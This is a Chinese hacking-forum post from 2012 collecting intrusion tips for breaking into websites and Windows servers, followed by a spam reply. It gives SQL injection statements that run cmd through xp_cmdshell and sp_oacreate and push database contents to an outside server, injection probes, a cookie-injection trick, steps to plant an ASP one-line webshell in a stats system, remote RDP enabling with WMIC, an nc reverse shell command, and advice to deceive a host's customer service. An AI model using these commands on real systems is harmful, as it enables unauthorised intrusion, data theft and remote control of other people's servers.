找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3195|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关6 j+ A, G; X* s( a" S  K2 O
  h1 S5 o+ O2 Y

8 k( o1 k+ H" J; S) y; LSA点数据库分离搞法+语句:  N. t( V4 y4 o' m6 z: P+ W
' u$ T' H# E7 }. @# ]: q
注射点不显错,执行下面三条语句页面都返回正常。7 Z/ g0 r9 j% \, \; q6 c
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
: `4 x! @+ h  p" D* W- Z. Hand 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')9 I# v0 u9 Q. g; Q  Q
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
: \# a" k2 L  H9 W5 w可以列目录,判断系统为2000,web与数据库分离
  _$ ]6 O) {, C. V+ y8 n遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。2 j9 W0 P  {7 P, c- S; k, f* ^
在注射点上执行7 E2 T" B: M6 F2 [% k
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--
5 F9 w2 V& H, U' L+ D1 D9 `; a页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
& a' G4 i  z8 i7 z& u/ \' m9 I还有我用NC监听得其他端口都没有得到IP。
( L- _1 W+ |2 I+ |1 D' W. C
, b: b0 O6 V0 E$ q5 J通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
' i, ^0 r: N8 p3 R7 X) d'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--# {( [  v7 Q2 |5 I5 P$ A6 |

- Z- I8 H1 u2 q" P# m$ X;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--% @, E! t) t4 a  a
4 g0 W9 V# y, ?" S
现在就猜想是不是数据库是内网而且不能连外网。0 Y: _" ~5 V2 L

8 f% s# U, P* o0 E. y* W8 \7 u7 `/ h& ?+ Z! l9 O, q0 p; @6 d
access导出txt文本代码
0 h' B" B8 L9 ?6 M. h* o. i8 A. JSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
# v2 H' \7 E9 C, s7 v
! H3 g5 L% z+ l6 t% m0 |4 v% C
5 i4 k' g8 b7 z
自动跳转到指定网站代码头
$ Q- Z; S" j1 x' M. V4 a1 h0 h<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>! J* E6 g  k; s0 ~: w; ~: g1 @

# W) I! s) N0 I4 L# f  Q% o, a% `4 }: q9 W
入侵java or jsp站点时默认配置文件路径:/ I( m. O0 f- Q6 |
\web-inf\web.xml# U2 @' _: k  t* Q
tomcat下的配置文件位置:9 @  {6 Z1 E$ p! P; v, o, M
\conf\server.xml            (前面加上tomcat路径)! U/ ^0 n1 U  H8 x
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
3 E, P; _) W4 [
% |* h& c. l* @' j" l+ ~( i5 d9 B3 w( B' X7 b

' S' J, a$ E+ R检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
/ W7 c! A0 w6 d. l, ]-1%23
* T  q8 f& l2 G. m( V0 q>
! |3 ~- i1 u" k<
" A8 t7 L* v1 ^' t. k1'+or+'1'='1) O; a; m' G- T" U
id=8%bf5 ^" N, W5 q  J- ]+ k  W9 V5 q
9 y  `6 r  i) R: m
全新注入点检测试法:
# A, r6 t: Y7 P; l% {" v* c! I& `- U在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。& Q  }5 M1 G# [/ x

6 _/ _6 k8 j6 V8 I# i6 `( M) {6 J在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。$ N4 w* |# ]9 p0 j; ^7 g8 P  n9 [9 K
) n( w  W  n7 b' J
搜索型注入判断方法:
& z$ ~& w; q6 ^6 `9 k/ i北京%' and '1'='1' and '%'='. ^! g( c; K; |, T# H/ [: H! N- {
北京%' and '1'='2' and '%'='
4 W% q( d" i  @9 z0 f8 ^& I
) l( J3 v# ?1 U& N/ A) f9 w7 h+ {2 x3 W, c. a
COOKIES注入:
" {% [! z! v1 O" w+ w7 }. n; ]
$ S2 V) A* I9 `& B# A6 {8 rjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
3 m" P5 d/ ^& [" a6 T8 m5 z
3 |* J* ~! _+ M4 e1 @2000专业版查看本地登录用户命令:% H" M& M. }* n
net config workstation+ [2 O8 |% W$ M, u# A
$ t: m1 P* f  f  S+ J0 X# N. u- r: E

- g9 N% ~3 K* ]7 f2003下查看ipsec配置和默认防火墙配置命令:; L8 Q. N' ]: ^) [2 `
netsh firewall show config
2 o& C3 q" Q6 I* g* d# ]netsh ipsec static show all- `* ?& M1 X+ D/ N

5 \3 D% c7 C% R0 K: ]: Q不指派指定策略命令:
9 a# u+ b3 Q" ^: O2 snetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
% s0 d6 ~8 N$ J! R% _" l7 z: S% q2 mnetsh ipsec static show policy all  显示策略名: w! Z) B% _+ d/ }3 `7 Q8 d

" `% _1 N9 @& D: F# B/ E' W
& @& a- _) `1 ^* E猜管理员后台小技巧:
/ g0 t( N$ }  w7 I, L1 K) Padmin/left.asp
" N5 q/ |  z% N# T$ Iadmin/main.asp
3 c0 w; D. F! radmin/top.asp
% J5 J9 W- u6 ^/ Xadmin/admin.asp ' F% q8 s2 e2 v  F! S% y
会现出菜单导航,然后迅雷下载全部链接$ f/ f& t' z% X4 h, h; I1 b
$ _1 i: D9 B; ?+ {; A

" x# i( a1 w3 Y) ^社会工程学:
' w0 U7 T& n) B8 ?用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人$ _& I7 n4 c* t. |0 X- N
然后去骗客服
2 K4 T, s! }2 m' p8 E
' N2 D+ S$ c4 o. P4 u0 O7 R7 X; \6 U8 S  @* Z3 _8 ~$ w
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 5 z7 }; p; b! D- E$ [: [( Q
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, ( W9 ^% H" y- h' l( y0 ^3 j
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。7 n% K9 S3 x6 F) O) r$ I6 ~, [

) c& o  k# R% e0 c5 A, v# s% V' w; U7 U
8 @# Y9 z& R( ^& B
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)( F& x  W* C7 t+ X* W) w; H

0 o  i( O% I8 c! \  x7 y6 \/ Z7 _6 [7 w  ^& o1 S5 v/ o% F
2 A3 ]8 W6 t  `& n
CMD加密注册表位置
" ~: W" r8 ~) n9 }(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor1 U$ P5 B" T, Q5 ]+ T& }+ a% M
AutoRun
4 J- G3 J8 T% u* F  H3 N# Y4 C, m! ?0 j: I  p5 X1 D5 ~$ F
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor8 B, Y$ z& v  u: v3 ?- d! Z, P
AutoRun
7 ?7 [  k2 Z7 N0 r  B$ T$ u" _) M/ C! X

" I$ a3 x- S, I$ {& T在找注入时搜索Hidden,把他改成test
9 z- K1 F7 j4 W: H7 C8 T% ~  i
" k/ q8 [+ d/ ?$ t3 ^: }$ G( q
4 i: D- A, Z1 M/ J- t
% b9 E: T' e# R7 g) a7 o. T! Umstsc /v:IP /console
( x2 h  S1 i" J. F. ^0 h' s* l, u5 ?* m- w6 @
" {  X3 i1 F. t. A
一句话开3389:
& N: v8 g9 o% Y; [1 f* M% q0 z! k9 H! I/ u. f3 Z* i
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
* B- ?! J4 d' `5 B; k3 M/ `开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.( {6 s- U% O" t; K

5 f3 @$ _6 T! L& L' Y: I; h
+ u! a# p/ A6 i4 C, [- o$ s知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:, J3 X& `/ K" p5 T, B9 x
Insert into admin(user,pwd) values('test','test')* e3 ]% A/ @) [, q# A, L
$ b7 J  \! C+ l+ l! O5 v6 E

& F* |2 a0 w. I% r: H0 T' ONC反弹
2 v" N2 X7 j8 P# _/ U9 V先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   - U( ?5 {5 J! m. C$ f! h9 K4 w
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)0 o& o7 L: ]3 `# V8 u
5 T* f" }; \  a! F
, U1 I  m) L& H' j0 h2 {
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题0 K$ u0 Q/ m  Z2 L
* g  q3 p0 z  e. u6 g$ k) I
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
( P" X6 W* x: T% I+ c例如:
; p- y* ?$ V0 u( V, Isubst k: d:\www\ 用d盘www目录替代k盘# r; q+ b2 g9 e5 b4 h9 B
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表